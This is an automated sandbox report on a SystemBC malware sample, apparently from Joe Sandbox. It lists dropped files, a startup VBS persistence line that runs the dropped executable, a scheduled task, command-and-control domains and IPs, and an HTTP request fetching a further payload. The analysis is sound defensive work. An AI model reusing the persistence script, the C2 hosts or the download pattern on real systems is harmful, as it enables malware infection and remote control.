                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameuC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        45.155.249.199
                                        		unknownGermany
                                        		34549MEER-ASmeerfarbigGmbHCoKGDEfalse
                                        78.41.139.3
                                        		wodresomdaymomentum.orgNorway
                                        		31367NEO-CUSTFRtrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1576044
                                        Start date and time:2024-12-16 13:35:02 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 10s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:uC4EETMDcz.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:01b4e5031bce630ff9a75984dbce65e4.exe
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winEXE@14/6@1/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 416
                                        • Number of non-executed functions: 37
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: uC4EETMDcz.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        07:36:18API Interceptor1x Sleep call for process: uC4EETMDcz.exe modified
                                        07:36:42API Interceptor2x Sleep call for process: wopbv.exe modified
                                        13:36:19Task SchedulerRun new task: Test Task17 path: C:\ProgramData\faer\wopbv.exe
                                        13:36:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        45.155.249.199file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                        • 45.155.249.199/files/winrar/eula.txt
                                        78.41.139.38xp4Uw0ali.dllGet hashmaliciousSystemBCBrowse
                                          Ewpeloxttug.exeGet hashmaliciousSystemBCBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            wodresomdaymomentum.org8xp4Uw0ali.dllGet hashmaliciousSystemBCBrowse
                                            • 78.41.139.3

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NEO-CUSTFR8xp4Uw0ali.dllGet hashmaliciousSystemBCBrowse
                                            • 78.41.139.3
                                            Ewpeloxttug.exeGet hashmaliciousSystemBCBrowse
                                            • 78.41.139.3
                                            HDZgBTqTXm.exeGet hashmaliciousTeslaCrypt, TrojanRansomBrowse
                                            • 158.255.74.164
                                            DHL-INV-NAC.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 158.255.78.78
                                            5egerdHX2aGet hashmaliciousMiraiBrowse
                                            • 78.41.142.215
                                            iwah6jVhmwGet hashmaliciousMiraiBrowse
                                            • 85.208.197.8
                                            MEER-ASmeerfarbigGmbHCoKGDEcNF6fXdjPw.dllGet hashmaliciousSocks5SystemzBrowse
                                            • 45.155.250.225
                                            x86_64.elfGet hashmaliciousUnknownBrowse
                                            • 45.90.96.167
                                            arm.elfGet hashmaliciousUnknownBrowse
                                            • 45.90.96.167
                                            spc.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167
                                            sh4.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167
                                            mips.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167
                                            ppc.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167
                                            arm5.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167
                                            arm6.elfGet hashmaliciousMiraiBrowse
                                            • 45.90.96.167

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\faer\wopbv.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1032736
                                            Entropy (8bit):7.919257819008481
                                            Encrypted:false
                                            SSDEEP:24576:vUfq8GRMFzYAUHh/T7TWY9Ixm9pwwfUCK3NbKJa4MvB:42RMcpVswfj84YB
                                            MD5:01B4E5031BCE630FF9A75984DBCE65E4
                                            SHA1:026F9B1F04DF0B009AA478A4A072DA9F38D695DD
                                            SHA-256:D7C59A22446F1C200C078A6E38131C755E1869717B939FA54B53360AF4D2A059
                                            SHA-512:4DFCEA7F892E12B2AC0A87F79B93FF678BEB57A7D71356B7FB733026E9C0941C906BA6EBF12BC7DFE3549BEC5B60293DFDE5170460F4E8E5FD2569FAB41109BD
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 58%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4_g.................F..........>e... ........@.. ....................................`..................................d..S....................P.. r........................................................... ............... ..H............text...DE... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................ e......H...........\................ ...........................................0..........(....*.*.(....*F .v..(....(....&*.(....(....*....0............ 7w..(....(..... .s..(....(.....s........o......s...........s......+..(.......&...,.......io......o.........,...o.......,...o...........,..o.......*...4....H..P........E.'l........9.?x........(.a.......2(.....o....*......(.... .v..(....(.....(....(...+o....*..(....*.~....-# .w..(.........(....o....s.........~....*.~....*.......*~(..

                                            C:\ProgramData\faer\wopbv.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            C:\Users\user\AppData\Local\brokerutil.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1032736
                                            Entropy (8bit):7.919257819008481
                                            Encrypted:false
                                            SSDEEP:24576:vUfq8GRMFzYAUHh/T7TWY9Ixm9pwwfUCK3NbKJa4MvB:42RMcpVswfj84YB
                                            MD5:01B4E5031BCE630FF9A75984DBCE65E4
                                            SHA1:026F9B1F04DF0B009AA478A4A072DA9F38D695DD
                                            SHA-256:D7C59A22446F1C200C078A6E38131C755E1869717B939FA54B53360AF4D2A059
                                            SHA-512:4DFCEA7F892E12B2AC0A87F79B93FF678BEB57A7D71356B7FB733026E9C0941C906BA6EBF12BC7DFE3549BEC5B60293DFDE5170460F4E8E5FD2569FAB41109BD
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 58%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4_g.................F..........>e... ........@.. ....................................`..................................d..S....................P.. r........................................................... ............... ..H............text...DE... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................ e......H...........\................ ...........................................0..........(....*.*.(....*F .v..(....(....&*.(....(....*....0............ 7w..(....(..... .s..(....(.....s........o......s...........s......+..(.......&...,.......io......o.........,...o.......,...o...........,..o.......*...4....H..P........E.'l........9.?x........(.a.......2(.....o....*......(.... .v..(....(.....(....(...+o....*..(....*.~....-# .w..(.........(....o....s.........~....*.~....*.......*~(..

                                            C:\Users\user\AppData\Local\brokerutil.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs

                                            Download File
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):86
                                            Entropy (8bit):4.65234334459712
                                            Encrypted:false
                                            SSDEEP:3:FER/n0eFHHoN+E2J5Hav1FNnHn:FER/lFHIN723o
                                            MD5:37A7A91DD1D964EA59D8DE29682E7978
                                            SHA1:9FB4FCC90640BFC7701DB85192A6EFB87A4C4A3F
                                            SHA-256:DDC01C5BA2DDA48EC311CFE05BB3BA7A1966AFA30241D46A74B368DECF996C69
                                            SHA-512:472A96E530989373ECC13962A7D1393F1B77ED4DE991E1E98E0E4EF2387DBF9FD9A828260DD69066C51ABCDFA149841B036695F79BAA57193AC637F808CF0674
                                            Malicious:true
                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\brokerutil.exe"""

                                            C:\Windows\Tasks\Test Task17.job

                                            Download File
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):244
                                            Entropy (8bit):3.335327093208964
                                            Encrypted:false
                                            SSDEEP:3:KcMPVXJSl/lm2/SblM6lEjlDryKPdN4atttxgyS9S7ARjLlAS/M2z0nlDQskXlN3:H/82abhEZPyKdtE9+AQy0lDY1NXt1
                                            MD5:7D783CD2172D188CBAA1E95204D3F0CF
                                            SHA1:10DF4835996D6B4EFD63C7D1822331B5C01749E8
                                            SHA-256:500352971E5794171790BA4B68ECB7C544F83FD71436EFF59BF3DBE578F84C60
                                            SHA-512:8F9DC87C2792771A067F561C8C7C85E3D59E492F8D843C73C21905CE13667713AEC42662088F4DA42DD8B131C18FD8197FD11405698D3B563FA49E19D98B46F9
                                            Malicious:false
                                            Preview:.......K...O.b......F.......<... .....\.......... ......................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.f.a.e.r.\.w.o.p.b.v...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.........L.....................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.919257819008481
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:uC4EETMDcz.exe
                                            File size:1'032'736 bytes
                                            MD5:01b4e5031bce630ff9a75984dbce65e4
                                            SHA1:026f9b1f04df0b009aa478a4a072da9f38d695dd
                                            SHA256:d7c59a22446f1c200c078a6e38131c755e1869717b939fa54b53360af4d2a059
                                            SHA512:4dfcea7f892e12b2ac0a87f79b93ff678beb57a7d71356b7fb733026e9c0941c906ba6ebf12bc7dfe3549bec5b60293dfde5170460f4e8e5fd2569fab41109bd
                                            SSDEEP:24576:vUfq8GRMFzYAUHh/T7TWY9Ixm9pwwfUCK3NbKJa4MvB:42RMcpVswfj84YB
                                            TLSH:9825231927CC0A35CDEE3EF6D1B2D2153B3DD1DB2322C389984493899491FE68927B5B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4_g.................F..........>e... ........@.. ....................................`................................

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4f653e
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x675F3401 [Sun Dec 15 19:54:41 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Authenticode Signature

                                            Signature Valid:false
                                            Signature Issuer:CN=Microsoft Marketplace CA G 027, OU=EOC, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 13/09/2024 02:07:32 16/09/2024 02:07:32
                                            Subject Chain
                                            • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                            Version:3
                                            Thumbprint MD5:F5B7BCC826B78AEF763836D82EF67DBA
                                            Thumbprint SHA-1:FDA943641AAA87F7EA61F7347FE92B9C3ABC3825
                                            Thumbprint SHA-256:51B79453AFF83A66E1EC1E1139143AAB93E8BC7D4E00E922857DEAE48B2F0543
                                            Serial:33003E3B13F845F76C76D487AB0001003E3B13

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf64e80x53.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf80000x600.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xf50000x7220
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xfa0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xf45440xf4600670da8be7d5f3d4cc8f65acfcd7302fbFalse0.9642273417519182data7.965586296497431IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xf80000x6000x600051579fd0620727e1c97eacedb4d0f4dFalse0.412109375data4.061624946907831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xfa0000xc0x20087b3c853d574c5f450a735a369848f5cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xf80a00x30cdata0.4230769230769231
                                            RT_MANIFEST0xf83ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 16, 2024 13:36:43.822382927 CET498134000192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:43.942356110 CET40004981378.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:43.942506075 CET498134000192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:43.942588091 CET498134000192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:44.062381029 CET40004981378.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:45.186831951 CET40004981378.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:45.186914921 CET40004981378.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:45.187052965 CET498134000192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:45.193938971 CET498134000192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:45.195656061 CET498155337192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:45.313942909 CET40004981378.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:45.315530062 CET53374981578.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:45.315814972 CET498155337192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:45.316756964 CET498155337192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:45.436570883 CET53374981578.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:46.559036970 CET53374981578.41.139.3192.168.2.6
                                            Dec 16, 2024 13:36:46.601485014 CET498155337192.168.2.678.41.139.3
                                            Dec 16, 2024 13:36:47.104617119 CET4982180192.168.2.645.155.249.199
                                            Dec 16, 2024 13:36:47.224658966 CET804982145.155.249.199192.168.2.6
                                            Dec 16, 2024 13:36:47.228672981 CET4982180192.168.2.645.155.249.199
                                            Dec 16, 2024 13:36:47.229559898 CET4982180192.168.2.645.155.249.199
                                            Dec 16, 2024 13:36:47.349409103 CET804982145.155.249.199192.168.2.6
                                            Dec 16, 2024 13:36:48.472740889 CET804982145.155.249.199192.168.2.6
                                            Dec 16, 2024 13:36:48.472860098 CET4982180192.168.2.645.155.249.199
                                            Dec 16, 2024 13:36:53.474456072 CET804982145.155.249.199192.168.2.6
                                            Dec 16, 2024 13:36:53.474526882 CET4982180192.168.2.645.155.249.199

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 16, 2024 13:36:43.175157070 CET5218553192.168.2.61.1.1.1
                                            Dec 16, 2024 13:36:43.814924955 CET53521851.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 16, 2024 13:36:43.175157070 CET192.168.2.61.1.1.10xd9b4Standard query (0)wodresomdaymomentum.orgA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 16, 2024 13:36:43.814924955 CET1.1.1.1192.168.2.60xd9b4No error (0)wodresomdaymomentum.org78.41.139.3A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • 45.155.249.199

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.64982145.155.249.199804324C:\ProgramData\faer\wopbv.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 16, 2024 13:36:47.229559898 CET127OUTGET /files/mailer/blue.exe HTTP/1.1
                                            User-Agent: Microsoft Internet Explorer
                                            Host: 45.155.249.199
                                            Cache-Control: no-cache
                                            Dec 16, 2024 13:36:48.472740889 CET437INHTTP/1.1 404 Not Found
                                            Date: Mon, 16 Dec 2024 12:36:48 GMT
                                            Server: Apache/2.4.58 (Ubuntu)
                                            Content-Length: 276
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 31 35 35 2e 32 34 39 2e 31 39 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at 45.155.249.199 Port 80</address></body></html>


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:1
                                            Start time:07:35:54
                                            Start date:16/12/2024
                                            Path:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\uC4EETMDcz.exe"
                                            Imagebase:0x670000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2396891242.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000001.00000002.2378662559.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:07:36:17
                                            Start date:16/12/2024
                                            Path:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\uC4EETMDcz.exe"
                                            Imagebase:0xa20000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:07:36:19
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\ProgramData\faer\wopbv.exe
                                            Imagebase:0x3d0000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000004.00000002.2619060689.000000000297B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
